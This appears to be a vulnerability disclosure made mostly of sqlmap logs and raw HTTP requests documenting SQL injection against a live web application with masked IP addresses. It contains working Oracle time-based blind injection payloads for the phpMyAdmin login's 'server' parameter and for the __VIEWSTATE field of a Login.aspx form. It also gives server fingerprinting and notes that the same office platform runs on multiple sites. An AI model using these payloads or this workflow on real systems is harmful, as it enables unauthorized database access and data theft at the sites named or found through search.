The phpMyAdmin address is exposed: http://**.**.**.**/db/index.php (version 2.11.1).
Injection point: "http://**.**.**.**/db/index.php?lang=zh-gb2312&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=2cf2e60511edfbfdd010d7be7ad32f33"
POST data: pma_username=&pma_password=&server=1&lang=zh-gb2312&convcharset=iso-8859-1
do you want to test this form? [Y/n/q]
> y
Edit POST data [default: pma_username=&pma_password=&server=1&lang=zh-gb2312&convcharset=iso-8859-1] (Warning: blank fields detected):
do you want to fill blank fields with random values? [Y/n] n
[15:44:44] [INFO] using 'C:\sqlmap\output\**.**.**.**\session' as session file
[15:44:44] [INFO] resuming injection data from session file
[15:44:44] [INFO] resuming back-end DBMS 'oracle' from session file
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: server
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: collation_connection=utf8_unicode_ci&convcharset=iso-8859-1&server=1) AND 9468=DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(111)||CHR(117)||CHR(74),5) AND (6861=6861&lang=zh-gb2312
---
do you want to exploit this SQL injection? [Y/n] y
[15:44:47] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Oracle
Second injection site: http://**.**.**.**/IPhone4/Login.aspx
POST /IPhone4/Login.aspx HTTP/1.1
Host: **.**.**.**
Content-Length: 369
Cache-Control: max-age=0
Origin: http://**.**.**.**
Upgrade-Insecure-Requests: 1
Referer: http://**.**.**.**/IPhone4/Login.aspx
Accept-Encoding: gzip, deflate

__VIEWSTATE=%2FwEPDwUKLTExMDcwNDM4OA9kFgJmD2QWAgIDDw9kFgIeCG9uY2hhbmdlBRNBbnRpU3FsVmFsaWQodGhpcyk7ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAgUIYnRuTG9naW4FDEltYWdlQnV0dG9uMftaawGQ1UcrtskTl0Mslv1yonr%2F&__EVENTVALIDATION=%2FwEWBQLJxePqBwKj1dLzBwKC3IeGDALG8eCkDwLSwpnTCDbU6RHeNSzhZgnLugzDGGYJjnfo&txtUserCode=13888888888&btnLogin.x=37&btnLogin.y=23&txtUserPwd=6666
Cache-Control → private, max-age=10800, pre-check=10800
Connection → close
Content-Type → text/html; charset=gb2312
Date → Sun, 10 Jan 2016 14:24:30 GMT
Expires → Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified → Thu, 20 Sep 2007 16:35:26 GMT
Server → Microsoft-IIS/6.0
X-Powered-By → ASP.NET
    Title: Oracle AND time-based blind
    Payload: __VIEWSTATE=/wEPDwUKLTExMDcwNDM4OA9kFgJmD2QWAgIDDw9kFgIeCG9uY2hhbmdlBRNBbnRpU3FsVmFsaWQodGhpcyk7ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAgUIYnRuTG9naW4FDEltYWdlQnV0dG9uMftaawGQ1UcrtskTl0Mslv1yonr/') AND 4326=DBMS_PIPE.RECEIVE_MESSAGE(CHR(117)||CHR(104)||CHR(88)||CHR(90),5) AND ('JHjr'='JHjr&__EVENTVALIDATION=/wEWBQLJxePqBwKj1dLzBwKC3IeGDALG8eCkDwLSwpnTCDbU6RHeNSzhZgnLugzDGGYJjnfo&txtUserCode=&btnLogin.x=1&btnLogin.y=1&txtUserPwd=
---
Combined search-engine queries show that the Mobile Office Declaration Platform (移动办公申报平台) is deployed on multiple sites.
Test parameter: __VIEWSTATE
Host IP: **.**.**.**
Web Server: Microsoft-IIS/6.0
Powered-by: ASP.NET
I guess injection type is Integer?!
If injection failed, retry with a manual keyword.
DB Server: Oracle
Page Found: http://**.**.**.**/login.html
N